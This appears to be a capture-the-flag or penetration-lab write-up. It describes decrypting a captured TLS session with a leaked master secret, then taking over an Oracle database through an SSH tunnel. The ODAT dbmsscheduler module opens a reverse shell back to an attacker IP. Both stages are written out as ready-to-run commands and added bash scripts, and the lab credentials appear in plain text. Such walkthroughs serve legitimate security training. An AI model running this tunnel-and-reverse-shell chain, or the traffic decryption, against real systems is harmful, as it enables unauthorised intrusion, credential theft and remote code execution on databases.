In this part of the article we are going to attack the JavaDev and DB systems.
As you can see in the diagram above, the DB system appears in the network, but JavaDev does not. JavaDev is not a separate host: its token is hidden in files that can be found on one of the other systems.
Attack on JavaDev: As we recall, we found a debug folder on the SSH system that contains a log file and a pcap file captured with Wireshark.
We opened the debug.txt file and found that the captured traffic is HTTPS, i.e. TLS-encrypted.
Scrolling further down the same text file, we found the client random (client nonce) and the master secret of the TLS session.
After looking up what both values are, we found that Wireshark can decrypt SSL/TLS traffic when it is given the client random and the master secret: the client random identifies the session in the capture and the master secret lets Wireshark derive the session keys, so the server's private key is not needed.
Previously, we saved both values in a separate text file, key.txt, in the NSS key log format that Wireshark reads (the label CLIENT_RANDOM, the 32-byte client random and the 48-byte master secret, all hex encoded, on a single line):
CLIENT_RANDOM 56448610b995cc0f8100560fcf0cf8be7330b2d2f31d86a4259e1ec102f76c50 7cda1b7081ae8a7fae76ca71fbc704ec24796ce5c1f53a15f16325b33946544fd0b1dabde4db187504a74c1138d163bf
Open Wireshark and go to Edit > Preferences.
Then select SSL from the Protocols section (it is called TLS in Wireshark 3.x and later).
In the (Pre)-Master-Secret log filename field, browse to the text file where we saved the client random and master secret, and press OK.
Now load the pcap file in Wireshark.
Now go to Analyze > Decode As...
Select SSL for the TCP port the HTTPS traffic uses; this makes Wireshark dissect that port as SSL/TLS, which is necessary when the traffic is not on a port it already treats as HTTPS.
Now click on the Client Hello packet and choose Analyze > Follow SSL Stream (Follow TLS Stream in newer versions).
In the decrypted stream we found the token for JavaDev and also the credentials for the database:
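The same decryption done from the command line with tshark, as an added example that is not part of the original write-up. It first writes key.txt in the NSS key log format and checks that every line has the lengths Wireshark expects (a malformed line is skipped silently, which looks like decryption simply not working), then runs tshark with the key log file, a Decode As rule and a Follow TLS Stream, which are the command-line equivalents of the GUI steps above. The client random and master secret are the values from debug.txt; the capture name debug.pcap and the HTTPS port 443 are assumptions, since the page does not state them.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: decrypt the capture with
# tshark instead of the Wireshark GUI.
# Assumptions (not stated on the page): the capture is debug.pcap and the
# HTTPS traffic runs on TCP port 443; override with PCAP and HTTPS_PORT.
set -u

# Values from the write-up's debug.txt: the 32-byte client random and the
# 48-byte master secret of the TLS session, hex encoded.
CLIENT_RANDOM="56448610b995cc0f8100560fcf0cf8be7330b2d2f31d86a4259e1ec102f76c50"
MASTER_SECRET="7cda1b7081ae8a7fae76ca71fbc704ec24796ce5c1f53a15f16325b33946544fd0b1dabde4db187504a74c1138d163bf"

# Write one line in the NSS key log format Wireshark reads:
#   CLIENT_RANDOM <client random> <master secret>
write_keylog() {   # write_keylog OUTFILE
    printf 'CLIENT_RANDOM %s %s\n' "$CLIENT_RANDOM" "$MASTER_SECRET" > "$1"
}

# Check the file before loading it: every non-comment line must be the label,
# 64 hex characters and 96 hex characters. Wireshark skips lines of the wrong
# shape (e.g. a truncated secret) without reporting an error.
keylog_valid() {   # keylog_valid FILE -> exit 0 if usable, 1 otherwise
    local total bad
    total=$(grep -Evc '^(#|$)' "$1" || true)
    bad=$(grep -Ev '^(#|$)' "$1" |
          grep -Evc '^CLIENT_RANDOM [0-9a-fA-F]{64} [0-9a-fA-F]{96}$' || true)
    [ "$total" -gt 0 ] && [ "$bad" -eq 0 ]
}

# Command-line equivalent of the GUI steps:
#   -o tls.keylog_file   = Edit > Preferences > Protocols > TLS > key log file
#   -d tcp.port==N,tls   = Analyze > Decode As > TLS on that port
#   -z follow,tls,...    = Analyze > Follow TLS Stream (stream 0)
# On Wireshark 2.x the protocol is still called "ssl" in all three places.
decrypt_pcap() {   # decrypt_pcap PCAP KEYLOG PORT
    tshark -r "$1" -o "tls.keylog_file:$2" -d "tcp.port==$3,tls" \
           -q -z "follow,tls,ascii,0"
}

# List the decrypted HTTP requests, useful when the token sits in a URL or a
# form body rather than in the first stream.
list_requests() {   # list_requests PCAP KEYLOG PORT
    tshark -r "$1" -o "tls.keylog_file:$2" -d "tcp.port==$3,tls" \
           -Y 'http.request' -T fields -e http.request.method -e http.request.full_uri
}

KEYLOG="${TMPDIR:-/tmp}/key.txt"
write_keylog "$KEYLOG"
if keylog_valid "$KEYLOG"; then
    echo "key.txt is well-formed"
else
    echo "key.txt is malformed, Wireshark would ignore it" >&2
fi

# The pcap is not reproduced here, so only decrypt when tshark and the
# capture are actually present.
PCAP="${PCAP:-debug.pcap}"
if command -v tshark >/dev/null 2>&1 && [ -f "$PCAP" ]; then
    list_requests "$PCAP" "$KEYLOG" "${HTTPS_PORT:-443}"
    decrypt_pcap "$PCAP" "$KEYLOG" "${HTTPS_PORT:-443}"
fi
```

If the Follow output stays encrypted, check the port in the Decode As rule first: a wrong port is the most common reason the key log is never consulted.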
DB Attack: Before attacking this system we need two things installed on our machine. First, Oracle support in Metasploit: https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux (install version 11.1 only)
Second, ODAT (Oracle Database Attacking Tool): https://github.com/quentinhardy/odat
Once both tools are configured, we need an SSH tunnel to reach the DB: notice in the network diagram that the SSH host sits on a different network from us and is the one that can reach the database at 192.168.0.5, so we forward local port 9000 through it to the Oracle listener on port 1521. Use the command: ssh -nNT -f -i <private key> -L 9000:192.168.0.5:1521 [email protected] (the argument to -i is the private key we use for the SSH system; -n, -N and -T suppress stdin, the remote command and the tty, and -f puts ssh in the background once it has authenticated).
Now, to connect to the database, we have the instance (SID), username and password that we found via JavaDev. Enter the following command:
Now we will use the ODAT tool. Type in: ./odat.py dbmsscheduler -s 127.0.0.1 -p 9000 -d XE -U TESTER1 -P Token_Java_dev_hydrogen1 --reverse-shell 10.10.81.190 443 (-s and -p point at our end of the tunnel, -d is the SID; the dbmsscheduler module abuses the DBMS_SCHEDULER package to run an OS command on the database server, here a reverse shell back to our machine at 10.10.81.190 on port 443, so a listener on that port must be running before the command is sent).
After running the command we get a reverse shell on our listener. Then simply search for the token with find / -name "token*" 2>/dev/null (a pattern without the wildcard would miss the .txt extension); the output is /u01/app/oracle/product/11.2.0/xe/token.txt
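The tunnel, a readiness check on the forwarded port and the ODAT call combined in one script, as an added example that is not part of the original write-up. It keeps the page's addresses, port, SID, credentials and callback target; the SSH target, the private key path, the ODAT directory and the use of nc for the port check are assumptions. Unlike the bare commands above it waits until local port 9000 actually accepts connections before ODAT is launched, since ssh -f returns before the forward has been proven usable, and it tears the tunnel down through a control socket afterwards.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: the SSH tunnel, a readiness
# check on the forwarded port and the ODAT call in one script.
# Values from the page: Oracle listener 192.168.0.5:1521 behind the SSH host,
# local port 9000, SID XE, user TESTER1 with the JavaDev token as password,
# reverse shell back to 10.10.81.190:443.
# Assumptions (not on the page): SSH_TARGET, SSH_KEY and ODAT_DIR below are
# placeholders; the port check uses nc when available, else bash's /dev/tcp.
set -u

SSH_TARGET="${SSH_TARGET:-user@ssh-host}"          # hypothetical; the page redacts the address
SSH_KEY="${SSH_KEY:-${HOME:-/root}/.ssh/id_rsa}"   # the -i argument the page leaves out
ODAT_DIR="${ODAT_DIR:-${HOME:-/root}/odat}"        # where odat.py was cloned
LOCAL_PORT=9000
DB_HOST=192.168.0.5
DB_PORT=1521
DB_SID=XE
DB_USER=TESTER1
DB_PASS=Token_Java_dev_hydrogen1
LHOST=10.10.81.190
LPORT=443
CTL="${TMPDIR:-/tmp}/odat-tunnel.sock"   # ssh control socket for clean teardown

# Return 0 once HOST:PORT accepts a TCP connection, 1 after TIMEOUT seconds.
# "ssh -f" returns as soon as authentication is done, so poll the forward
# instead of sleeping a fixed time and hoping.
wait_for_port() {   # wait_for_port HOST PORT TIMEOUT
    local host=$1 port=$2 deadline
    deadline=$(( $(date +%s) + $3 ))
    while [ "$(date +%s)" -lt "$deadline" ]; do
        if command -v nc >/dev/null 2>&1; then
            nc -z -w 1 "$host" "$port" >/dev/null 2>&1 && return 0
        else
            (exec 3<>"/dev/tcp/$host/$port") 2>/dev/null && return 0
        fi
        sleep 1
    done
    return 1
}

open_tunnel() {
    # -n: no stdin  -N: no remote command  -T: no tty  -f: background after auth
    # -M -S: keep a control socket so close_tunnel can shut the forward down
    ssh -nNT -f -M -S "$CTL" -i "$SSH_KEY" \
        -L "${LOCAL_PORT}:${DB_HOST}:${DB_PORT}" "$SSH_TARGET"
}

close_tunnel() {
    ssh -S "$CTL" -O exit "$SSH_TARGET" 2>/dev/null || true
}

run_odat() {
    # The dbmsscheduler module uses the DBMS_SCHEDULER package to run an OS
    # command on the DB host; --reverse-shell makes that command connect back
    # to LHOST:LPORT. -s/-p point at our end of the tunnel, -d is the SID.
    (cd "$ODAT_DIR" && ./odat.py dbmsscheduler -s 127.0.0.1 -p "$LOCAL_PORT" \
        -d "$DB_SID" -U "$DB_USER" -P "$DB_PASS" \
        --reverse-shell "$LHOST" "$LPORT")
}

main() {
    echo "Start a listener first in another terminal, e.g. nc -lvnp $LPORT (root for 443)"
    open_tunnel || { echo "ssh tunnel failed" >&2; return 1; }
    if ! wait_for_port 127.0.0.1 "$LOCAL_PORT" 10; then
        echo "nothing answering on 127.0.0.1:$LOCAL_PORT; can the SSH host reach $DB_HOST:$DB_PORT?" >&2
        close_tunnel
        return 1
    fi
    run_odat
    close_tunnel
}

# Only define the functions unless called as "./tunnel_odat.sh run", so the
# file can also be sourced.
if [ "${1:-}" = "run" ]; then
    main
fi
```

The listener is deliberately left to a second terminal rather than backgrounded here, because the shell that arrives on it is interactive and is where the find command for the token is typed.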